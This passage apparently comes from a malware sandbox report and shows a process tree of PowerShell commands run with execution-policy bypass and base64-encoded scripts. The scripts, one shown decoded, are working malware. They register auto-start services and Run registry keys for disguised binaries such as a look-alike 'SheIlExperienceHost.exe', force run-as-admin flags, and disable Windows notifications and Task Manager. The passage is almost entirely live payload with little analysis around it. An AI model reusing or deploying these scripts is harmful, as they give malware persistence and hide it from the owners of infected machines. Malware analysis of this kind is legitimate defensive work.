YwBoAGMAcAAgADYANQAwADAAMQAKACQAUAByAG8AZwByAGUAcwBzAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAJwBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACcACgAKAFMAZQB0AC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIAAtAFMAYwBvAHAAZQAgAEMAdQByAHIAZQBuAHQAVQBzAGUAcgAgAEIAeQBwAGEAcwBzACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABMAG8AYwBhAGwATQBhAGMAaABpAG4AZQAgAEIAeQBwAGEAcwBzACAALQBGAG8AcgBjAGUACgAKACQAcwBlAHIAdgBpAGMAZQBzACAAPQAgAEAAKAAKACAAIAAgACAAQAB7AE4AYQBtAGUAPQAiAFAAcgBvAGcAcgBhAG0AcwBDAGEAYwBoAGUAIgA7ACAARABpAHMAcABsAGEAeQBOAGEAbQBlAD0AIgBDAGEAYwBoAGUAIABQAHIAbwBnAHIAYQBtACAAQwBvAG4AdAByAG8AbAAiADsAIABEAGUAcwBjAHIAaQBwAHQAaQBvAG4APQAiAE0AYQBuAGEAZwBlAHMAIABhAG4AZAAgAGkAbQBwAGwAZQBtAGUAbgB0AHMAIABDAGEAYwBoAGUAIABQAHIAbwBnAHIAYQBtACAAQwBvAG4AdAByAG8AbAAgAHUAcwBlAGQAIABmAG8AcgAgAGIAYQBjAGsAdQBwACAAYQBuAGQAIABvAHQAaABlAHIAIABwAHUAcgBwAG8AcwBlAHMALgAgAEkAZgAgAHQAaABpAHMAIABzAGUAcgB2AGkAYwBlACAAaQBzACAAcwB0AG8AcABwAGUAZAAsACAAcwBoAGEAZABvAHcAIABjAG8AcABpAGUAcwAgAHcAaQBsAGwAIABiAGUAIAB1AG4AYQB2AGEAaQBsAGEAYgBsAGUAIABmAG8AcgAgAGIAYQBjAGsAdQBwACAAYQBuAGQAIAB0AGgAZQAgAGIAYQBjAGsAdQBwACAAbQBhAHkAIABmAGEAaQBsAC4AIABJAGYAIAB0AGgAaQBzACAAcwBlAHIAdgBpAGMAZQAgAGkAcwAgAGQAaQBzAGEAYgBsAGUAZAAsACAAYQBuAHkAIABzAGUAcgB2AGkAYwBlAHMAIAB0AGgAYQB0ACAAZQB4AHAAbABpAGMAaQB0AGwAeQAgAGQAZQBwAGUAbgBkACAAbwBuACAAaQB0ACAAdwBpAGwAbAAgAGYAYQBpAGwAIAB0AG8AIABzAHQAYQByAHQALgAiADsAIABCAGkAbgBhAHIAeQBQAGEAdABoAE4AYQBtAGUAPQAiACQAZQBuAHYAOgBQAFIATwBHAFIAQQBNAEQAQQBUAEEAXABCAHIAYQB2AGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIALgBlAHgAZQAiAH0ALAAKACAAIAAgACAAQAB7AE4AYQBtAGUAPQAiAFIAZQBnAGUAZABpAHQAQwBhAGMAaABlACIAOwAgAEQAaQBzAHAAbABhAHkATgBhAG0AZQA9ACIAUgBlAGcAaQBzAHQAcgB5ACAARQBkAGkAdABvAHIAIABDAGEAYwBoAGUAIABDAG8AbgB0AHIAbwBsACIAOwAgAEQAZQBzAGMAcgBpAHAAdABpAG8AbgA9ACIATQBhAG4AYQBnAGUAcwAgAGEAbgBkACAAaQBtAHAAbABlAG0AZQBuAHQAcwAgAEMAYQBjAGgAZQAgAFIAZQBnAGkAcwB0AHIAeQAgAFAAcgBvAGcAcgBhAG0AIABDAG8AbgB0AHIAbwBsACAAdQBzAGUAZAAgAGYAbwByACAAYgBhAGMAawB1AHAAIABhAG4AZAAgAG8AdABoAGUAcgAgAHAAdQByAHAAbwBzAGUAcwAuACAASQBmACAAdABoAGkAcwAgAHMAZQByAHYAaQBjAGUAIABpAHMAIABzAHQAbwBwAHAAZQBkACwAIABzAGgAYQBkAG8AdwAgAGMAbwBwAGkAZQBzACAAdwBpAGwAbAAgAGIAZQAgAHUAbgBhAHYAYQBpAGwAYQBiAGwAZQAgAGYAbwByACAAYgBhAGMAawB1AHAAIABhAG4AZAAgAHQAaABlACAAYgBhAGMAawB1AHAAIABtAGEAeQAgAGYAYQBpAGwALgAgAEkAZgAgAHQAaABpAHMAIABzAGUAcgB2AGkAYwBlACAAaQBzACAAZABpAHMAYQBiAGwAZQBkACwAIABhAG4AeQAgAHMAZQByAHYAaQBjAGUAcwAgAHQAaABhAHQAIABlAHgAcABsAGkAYwBpAHQAbAB5ACAAZABlAHAAZQBuAGQAIABvAG4AIABpAHQAIAB3AGkAbABsACAAZgBhAGkAbAAgAHQAbwAgAHMAdABhAHIAdAAuACIAOwAgAEIAaQBuAGEAcgB5AFAAYQB0AGgATgBhAG0AZQA9ACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAEUAbQBiAGUAZABpAHQALgBlAHgAZQAiAH0ALAAKACAAIAAgACAAQAB7AE4AYQBtAGUAPQAiAEQAZQB2AEEAcwBzAG8AYwBNAGEAbgAiADsAIABEAGkAcwBwAGwAYQB5AE4AYQBtAGUAPQAiAEQAZQB2AGkAYwBlACAAQQBzAHMAbwBjAGkAYQB0AGkAbwBuACAATQBhAG4AYQBnAGUAcgAiADsAIABEAGUAcwBjAHIAaQBwAHQAaQBvAG4APQAiAE0AYQBuAGEAZwBlAHMAIABhAG4AZAAgAGkAbQBwAGwAZQBtAGUAbgB0AHMAIABEAGUAdgBpAGMAZQAgAEEAcwBzAG8AYwBpAGEAdABpAG8AbgAgAE0AYQBuAGEAZwBlAHIAIAB1AHMAZQBkACAAZgBvAHIAIABiAGEAYwBrAHUAcAAgAGEAbgBkACAAbwB0AGgAZQByACAAcAB1AHIAcABvAHMAZQBzAC4AIABJAGYAIAB0AGgAaQBzACAAcwBlAHIAdgBpAGMAZQAgAGkAcwAgAHMAdABvAHAAcABlAGQALAAgAHMAaABhAGQAbwB3ACAAYwBvAHAAaQBlAHMAIAB3AGkAbABsACAAYgBlACAAdQBuAGEAdgBhAGkAbABhAGIAbABlACAAZgBvAHIAIABiAGEAYwBrAHUAcAAgAGEAbgBkACAAdABoAGUAIABiAGEAYwBrAHUAcAAgAG0AYQB5ACAAZgBhAGkAbAAuACAASQBmACAAdABoAGkAcwAgAHMAZQByAHYAaQBjAGUAIABpAHMAIABkAGkAcwBhAGIAbABlAGQALAAgAGEAbgB5ACAAcwBlAHIAdgBpAGMAZQBzACAAdABoAGEAdAAgAGUAeABwAGwAaQBjAGkAdABsAHkAIABkAGUAcABlAG4AZAAgAG8AbgAgAGkAdAAgAHcAaQBsAGwAIABmAGEAaQBsACAAdABvACAAcwB0AGEAcgB0AC4AIgA7ACAAQgBpAG4AYQByAHkAUABhAHQAaABOAGEAbQBlAD0AIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAEcAbwBvAGcAbABlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByAC4AZQB4AGUAIgB9ACwACgAgACAAIAAgAEAAewBOAGEAbQBlAD0AIgBOAGcAYwBDAHAAbQByAFMAdgBjACIAOwAgAEQAaQBzAHAAbABhAHkATgBhAG0AZQA9ACIATQBpAGMAcgBvAHMAbwBmAHQAIABDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIABQAGEAcwBzAHAAbwByAHQAIgA7ACAARABlAHMAYwByAGkAcAB0AGkAbwBuAD0AIgBNAGEAbgBhAGcAZQBzACAAYQBuAGQAIABpAG0AcABsAGUAbQBlAG4AdABzACAATQBpAGMAcgBvAHMAbwBmAHQAIABDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIABQAGEAcwBzAHAAbwByAHQAIAB1AHMAZQBkACAAZgBvAHIAIABiAGEAYwBrAHUAcAAgAGEAbgBkACAAbwB0AGgAZQByACAAcAB1AHIAcABvAHMAZQBzAC4AIABJAGYAIAB0AGgAaQBzACAAcwBlAHIAdgBpAGMAZQAgAGkAcwAgAHMAdABvAHAAcABlAGQALAAgAHMAaABhAGQAbwB3ACAAYwBvAHAAaQBlAHMAIAB3AGkAbABsACAAYgBlACAAdQBuAGEAdgBhAGkAbABhAGIAbABlACAAZgBvAHIAIABiAGEAYwBrAHUAcAAgAGEAbgBkACAAdABoAGUAIABiAGEAYwBrAHUAcAAgAG0AYQB5ACAAZgBhAGkAbAAuACAASQBmACAAdABoAGkAcwAgAHMAZQByAHYAaQBjAGUAIABpAHMAIABkAGkAcwBhAGIAbABlAGQALAAgAGEAbgB5ACAAcwBlAHIAdgBpAGMAZQBzACAAdABoAGEAdAAgAGUAeABwAGwAaQBjAGkAdABsAHkAIABkAGUAcABlAG4AZAAgAG8AbgAgAGkAdAAgAHcAaQBsAGwAIABmAGEAaQBsACAAdABvACAAcwB0AGEAcgB0AC4AIgA7ACAAQgBpAG4AYQByAHkAUABhAHQAaABOAGEAbQBlAD0AIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAEcAbwBvAGcAbABlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByADYANAAuAGUAeABlACIAfQAsAAoAIAAgACAAIABAAHsATgBhAG0AZQA9ACIAUgBlAG0AZQBkAHkAUAByAG8AYwAiADsAIABEAGkAcwBwAGwAYQB5AE4AYQBtAGUAPQAiAFIAZQBtAGUAZAB5ACAAUAByAG8AYwBlAHMAcwBlAHMAIgA7ACAARABlAHMAYwByAGkAcAB0AGkAbwBuAD0AIgBNAGEAbgBhAGcAZQBzACAAYQBuAGQAIABpAG0AcABsAGUAbQBlAG4AdABzACAAUgBlAG0AZQBkAHkAIABQAHIAbwBjAGUAcwBzAGUAcwAgAE0AYQBuAGEAZwBlAHIAIABDAG8AbgB0AHIAbwBsACAAdQBzAGUAZAAgAGYAbwByACAAYgBhAGMAawB1AHAAIABhAG4AZAAgAG8AdABoAGUAcgAgAHAAdQByAHAAbwBzAGUAcwAuACAASQBmACAAdABoAGkAcwAgAHMAZQByAHYAaQBjAGUAIABpAHMAIABzAHQAbwBwAHAAZQBkACwAIABzAGgAYQBkAG8AdwAgAGMAbwBwAGkAZQBzACAAdwBpAGwAbAAgAGIAZQAgAHUAbgBhAHYAYQBpAGwAYQBiAGwAZQAgAGYAbwByACAAYgBhAGMAawB1AHAAIABhAG4AZAAgAHQAaABlACAAYgBhAGMAawB1AHAAIABtAGEAeQAgAGYAYQBpAGwALgAgAEkAZgAgAHQAaABpAHMAIABzAGUAcgB2AGkAYwBlACAAaQBzACAAZABpAHMAYQBiAGwAZQBkACwAIABhAG4AeQAgAHMAZQByAHYAaQBjAGUAcwAgAHQAaABhAHQAIABlAHgAcABsAGkAYwBpAHQAbAB5ACAAZABlAHAAZQBuAGQAIABvAG4AIABpAHQAIAB3AGkAbABsACAAZgBhAGkAbAAgAHQAbwAgAHMAdABhAHIAdAAuACIAOwAgAEIAaQBuAGEAcgB5AFAAYQB0AGgATgBhAG0AZQA9ACIAJABlAG4AdgA6AEwATwBDAEEATABBAFAAUABEAEEAVABBAFwAUwBoAGUASQBsAEUAeABwAGUAcgBpAGUAbgBjAGUASABvAHMAdAAuAGUAeABlACIAfQAKACkACgAKAGYAbwByAGUAYQBjAGgAIAAoACQAcwBlAHIAdgBpAGMAZQAgAGkAbgAgACQAcwBlAHIAdgBpAGMAZQBzACkAIAB7AAoAIAAgACAAIABOAGUAdwAtAFMAZQByAHYAaQBjAGUAIAAtAE4AYQBtAGUAIAAkAHMAZQByAHYAaQBjAGUALgBOAGEAbQBlACAALQBEAGkAcwBwAGwAYQB5AE4AYQBtAGUAIAAkAHMAZQByAHYAaQBjAGUALgBEAGkAcwBwAGwAYQB5AE4AYQBtAGUAIAAtAEQAZQBzAGMAcgBpAHAAdABpAG8AbgAgACQAcwBlAHIAdgBpAGMAZQAuAEQAZQBzAGMAcgBpAHAAdABpAG8AbgAgAC0AUwB0AGEAcgB0AHUAcABUAHkAcABlACAAIgBBAHUAdABvAG0AYQB0AGkAYwAiACAALQBCAGkAbgBhAHIAeQBQAGEAdABoAE4AYQBtAGUAIAAkAHMAZQByAHYAaQBjAGUALgBCAGkAbgBhAHIAeQBQAGEAdABoAE4AYQBtAGUACgB9AAoA6⤵PID:5896
-
C:\Windows\system32\chcp.com"C:\Windows\system32\chcp.com" 650017⤵PID:6012
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -exec bypass -enc YwBoAGMAcAAgADYANQAwADAAMQAKACQAUAByAG8AZwByAGUAcwBzAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAJwBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACcACgAKAFMAZQB0AC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIAAtAFMAYwBvAHAAZQAgAEMAdQByAHIAZQBuAHQAVQBzAGUAcgAgAEIAeQBwAGEAcwBzACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABMAG8AYwBhAGwATQBhAGMAaABpAG4AZQAgAEIAeQBwAGEAcwBzACAALQBGAG8AcgBjAGUACgAKACQAYQBwAHAAQwBvAG0AcABhAHQAUABhAHQAaABzACAAPQAgAEAAKAAKAAkAIgAkAGUAbgB2ADoAUABSAE8ARwBSAEEATQBEAEEAVABBAFwAQgByAGEAdgBlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByAC4AZQB4AGUAIgAsAAoACQAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwARwBvAG8AZwBsAGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIALgBlAHgAZQAiACwACgAgACAAIAAgACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAEEAUABQAEQAQQBUAEEAXABMAE8AQwBBAEwAXABUAEUATQBQAFwAZABJAGwAaABvAHMAdAAuAGUAeABlACIALAAKACAAIAAgACAAIgAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdABcAFQARQBNAFAAXABkAEkAbABoAG8AcwB0AC4AZQB4AGUAIgAsAAoACQAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwARwBvAG8AZwBsAGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIANgA0AC4AZQB4AGUAIgAsAAoAIAAgACAAIAAiACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAXABBAFAAUABEAEEAVABBAFwATABPAEMAQQBMAFwAVABFAE0AUABcAGQAbABJAGgAbwBzAHQALgBlAHgAZQAiACwACgAgACAAIAAgACIAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAXABUAEUATQBQAFwAZABsAEkAaABvAHMAdAAuAGUAeABlACIALAAKAAkAIgAkAGUAbgB2ADoAVQBTAEUAUgBQAFIATwBGAEkATABFAFwARQBtAGIAZQBkAGkAdAAuAGUAeABlACIALAAKAAkAIgAkAGUAbgB2ADoATABPAEMAQQBMAEEAUABQAEQAQQBUAEEAXABTAGgAZQBJAGwARQB4AHAAZQByAGkAZQBuAGMAZQBIAG8AcwB0AC4AZQB4AGUAIgAKACkACgAKAGYAbwByAGUAYQBjAGgAIAAoACQAcABhAHQAaAAgAGkAbgAgACQAYQBwAHAAQwBvAG0AcABhAHQAUABhAHQAaABzACkAIAB7AAoAIAAgACAAIABOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAIgBIAEsATABNADoAXABTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABOAFQAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABBAHAAcABDAG8AbQBwAGEAdABGAGwAYQBnAHMAXABMAGEAeQBlAHIAcwAiACAALQBOAGEAbQBlACAAJABwAGEAdABoACAALQBWAGEAbAB1AGUAIAAiAH4AIABSAFUATgBBAFMAQQBEAE0ASQBOACIAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAAUwB0AHIAaQBuAGcAIAAtAEYAbwByAGMAZQAKACAAIAAgACAAUwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEwATQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAATgBUAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAQQBwAHAAQwBvAG0AcABhAHQARgBsAGEAZwBzAFwATABhAHkAZQByAHMAIgAgAC0ATgBhAG0AZQAgACQAcABhAHQAaAAgAC0AVAB5AHAAZQAgAFMAdAByAGkAbgBnACAALQBWAGEAbAB1AGUAIAAiAH4AIABSAFUATgBBAFMAQQBEAE0ASQBOACIAIAAtAEYAbwByAGMAZQAKACAAIAAgACAATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAATgBUAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAQQBwAHAAQwBvAG0AcABhAHQARgBsAGEAZwBzAFwATABhAHkAZQByAHMAIgAgAC0ATgBhAG0AZQAgACQAcABhAHQAaAAgAC0AVgBhAGwAdQBlACAAIgB+ACAAUgBVAE4AQQBTAEEARABNAEkATgAiACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgAFMAdAByAGkAbgBnACAALQBGAG8AcgBjAGUACgAgACAAIAAgAFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAE4AVABcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAEEAcABwAEMAbwBtAHAAYQB0AEYAbABhAGcAcwBcAEwAYQB5AGUAcgBzACIAIAAtAE4AYQBtAGUAIAAkAHAAYQB0AGgAIAAtAFQAeQBwAGUAIABTAHQAcgBpAG4AZwAgAC0AVgBhAGwAdQBlACAAIgB+ACAAUgBVAE4AQQBTAEEARABNAEkATgAiACAALQBGAG8AcgBjAGUACgB9AAoA6⤵PID:6040
-
C:\Windows\system32\chcp.com"C:\Windows\system32\chcp.com" 650017⤵PID:1152
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -exec bypass -enc YwBoAGMAcAAgADYANQAwADAAMQAKACQAUAByAG8AZwByAGUAcwBzAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAJwBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACcACgAKAFMAZQB0AC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIAAtAFMAYwBvAHAAZQAgAEMAdQByAHIAZQBuAHQAVQBzAGUAcgAgAEIAeQBwAGEAcwBzACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABMAG8AYwBhAGwATQBhAGMAaABpAG4AZQAgAEIAeQBwAGEAcwBzACAALQBGAG8AcgBjAGUACgAKACQAcgB1AG4ARQBuAHQAcgBpAGUAcwAgAD0AIABAACgACgAgACAAIAAgAEAAewBOAGEAbQBlAD0AIgBCAHIAYQB2AGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIAIgA7ACAAVgBhAGwAdQBlAD0AIgAkAGUAbgB2ADoAUABSAE8ARwBSAEEATQBEAEEAVABBAFwAQgByAGEAdgBlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByAC4AZQB4AGUAIgB9ACwACgAgACAAIAAgAEAAewBOAGEAbQBlAD0AIgBCAHIAYQB2AGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIAIgA7ACAAVgBhAGwAdQBlAD0AIgAkAGUAbgB2ADoAVQBTAEUAUgBQAFIATwBGAEkATABFAFwARQBtAGIAZQBkAGkAdAAuAGUAeABlACIAfQAsAAoAIAAgACAAIABAAHsATgBhAG0AZQA9ACIARwBvAG8AZwBsAGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIAIgA7ACAAVgBhAGwAdQBlAD0AIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAEcAbwBvAGcAbABlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByAC4AZQB4AGUAIgB9ACwACgAgACAAIAAgAEAAewBOAGEAbQBlAD0AIgBHAG8AbwBnAGwAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgA2ADQAIgA7ACAAVgBhAGwAdQBlAD0AIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAEcAbwBvAGcAbABlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByADYANAAuAGUAeABlACIAfQAsAAoAIAAgACAAIABAAHsATgBhAG0AZQA9ACIAUwBoAGUASQBsAEUAeABwAGUAcgBpAGUAbgBjAGUASABvAHMAdAAiADsAIABWAGEAbAB1AGUAPQAiACQAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQBcAFMAaABlAEkAbABFAHgAcABlAHIAaQBlAG4AYwBlAEgAbwBzAHQALgBlAHgAZQAiAH0ACgApAAoACgBmAG8AcgBlAGEAYwBoACAAKAAkAGUAbgB0AHIAeQAgAGkAbgAgACQAcgB1AG4ARQBuAHQAcgBpAGUAcwApACAAewAKACAAIAAgACAATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AIgAgAC0ATgBhAG0AZQAgACQAZQBuAHQAcgB5AC4ATgBhAG0AZQAgAC0AVgBhAGwAdQBlACAAJABlAG4AdAByAHkALgBWAGEAbAB1AGUAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAAUwB0AHIAaQBuAGcAIAAtAEYAbwByAGMAZQAKACAAIAAgACAAUwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AIgAgAC0ATgBhAG0AZQAgACQAZQBuAHQAcgB5AC4ATgBhAG0AZQAgAC0AVgBhAGwAdQBlACAAJABlAG4AdAByAHkALgBWAGEAbAB1AGUAIAAtAFQAeQBwAGUAIABTAHQAcgBpAG4AZwAgAC0ARgBvAHIAYwBlAAoAIAAgACAAIABOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAIgBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABSAHUAbgAiACAALQBOAGEAbQBlACAAJABlAG4AdAByAHkALgBOAGEAbQBlACAALQBWAGEAbAB1AGUAIAAkAGUAbgB0AHIAeQAuAFYAYQBsAHUAZQAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIABTAHQAcgBpAG4AZwAgAC0ARgBvAHIAYwBlAAoAIAAgACAAIABTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAIgBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABSAHUAbgAiACAALQBOAGEAbQBlACAAJABlAG4AdAByAHkALgBOAGEAbQBlACAALQBWAGEAbAB1AGUAIAAkAGUAbgB0AHIAeQAuAFYAYQBsAHUAZQAgAC0AVAB5AHAAZQAgAFMAdAByAGkAbgBnACAALQBGAG8AcgBjAGUACgB9AAoA6⤵
- Adds Run key to start application
PID:5152 -
C:\Windows\system32\chcp.com"C:\Windows\system32\chcp.com" 650017⤵PID:5560
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -exec bypass -enc c h c p   6 5 0 0 1 
 $ P r o g r e s s P r e f e r e n c e   =   ' S i l e n t l y C o n t i n u e ' 
 
 S e t - E x e c u t i o n P o l i c y   - S c o p e   C u r r e n t U s e r   B y p a s s   - F o r c e 
 S e t - E x e c u t i o n P o l i c y   - S c o p e   L o c a l M a c h i n e   B y p a s s   - F o r c e 
 
 N e w - I t e m P r o p e r t y   " H K L M : \ S o f t w a r e \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ P u s h N o t i f i c a t i o n s "   - N a m e   " T o a s t E n a b l e d "   - P r o p e r t y T y p e   " D W o r d "   - V a l u e   0   - F o r c e 
 S e t - I t e m P r o p e r t y   " H K L M : \ S o f t w a r e \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ P u s h N o t i f i c a t i o n s "   - N a m e   " T o a s t E n a b l e d "   - T y p e   D W o r d   - V a l u e   0   - F o r c e 
 N e w - I t e m P r o p e r t y   " H K C U : \ S o f t w a r e \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ P u s h N o t i f i c a t i o n s "   - N a m e   " T o a s t E n a b l e d "   - P r o p e r t y T y p e   " D W o r d "   - V a l u e   0   - F o r c e 
 S e t - I t e m P r o p e r t y   " H K C U : \ S o f t w a r e \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ P u s h N o t i f i c a t i o n s "   - N a m e   " T o a s t E n a b l e d "   - T y p e   D W o r d   - V a l u e   0   - F o r c e 
 
 N e w - I t e m   - P a t h   " H K L M : \ S Y S T E M \ C u r r e n t C o n t r o l S e t \ C o n t r o l \ "   - N a m e   " G r a p h i c s D r i v e r s "   - F o r c e 
 N e w - I t e m P r o p e r t y   " H K L M : \ S Y S T E M \ C u r r e n t C o n t r o l S e t \ C o n t r o l \ G r a p h i c s D r i v e r s "   - N a m e   " H w S c h M o d e "   - P r o p e r t y T y p e   D W O R D   - V a l u e   1   - F o r c e 
 S e t - I t e m P r o p e r t y   " H K L M : \ S Y S T E M \ C u r r e n t C o n t r o l S e t \ C o n t r o l \ G r a p h i c s D r i v e r s "   - N a m e   " H w S c h M o d e "   - T y p e   D W o r d   - V a l u e   1   - F o r c e 
 N e w - I t e m   - P a t h   " H K C U : \ S Y S T E M \ C u r r e n t C o n t r o l S e t \ C o n t r o l \ "   - N a m e   " G r a p h i c s D r i v e r s "   - F o r c e 
 N e w - I t e m P r o p e r t y   " H K C U : \ S Y S T E M \ C u r r e n t C o n t r o l S e t \ C o n t r o l \ G r a p h i c s D r i v e r s "   - N a m e   " H w S c h M o d e "   - P r o p e r t y T y p e   D W O R D   - V a l u e   1   - F o r c e 
 S e t - I t e m P r o p e r t y   " H K C U : \ S Y S T E M \ C u r r e n t C o n t r o l S e t \ C o n t r o l \ G r a p h i c s D r i v e r s "   - N a m e   " H w S c h M o d e "   - T y p e   D W o r d   - V a l u e   1   - F o r c e 
 
 N e w - I t e m   - P a t h   " H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ P o l i c i e s "   - N a m e   " S y s t e m "   - F o r c e 
 N e w - I t e m P r o p e r t y   " H K L M : \ S o f t w a r e \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ P o l i c i e s \ S y s t e m "   - N a m e   " D i s a b l e T a s k M g r "   - P r o p e r t y T y p e   " D W o r d "   - V a l u e   1   - F o r c e 
 S e t - I t e m P r o p e r t y   " H K L M : \ S o f t w a r e \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ P o l i c i e s \ S y s t e m "   - N a m e   " D i s a b l e T a s k M g r "   - T y p e   D W o r d   - V a l u e   1   - F o r c e 
 N e w - I t e m   - P a t h   " H K C U : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ P o l i c i e s "   - N a m e   " S y s t e m "   - F o r c e 
 N e w - I t e m P r o p e r t y   " H K C U : \ S o f t w a r e \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ P o l i c i e s \ S y s t e m "   - N a m e   " D i s a b l e T a s k M g r "   - P r o p e r t y T y p e   " D W o r d "   - V a l u e   1   - F o r c e 
 S e t - I t e m P r o p e r t y   " H K C U : \ S o f t w a r e \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ P o l i c i e s \ S y s t e m "   - N a m e   " D i s a b l e T a s k M g r "   - T y p e   D W o r d   - V a l u e   1   - F o r c e 
 
 N e w - I t e m   - P a t h   " H K L M : \ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s "   - N a m e   " E x p l o r e r "   - F o r c e 
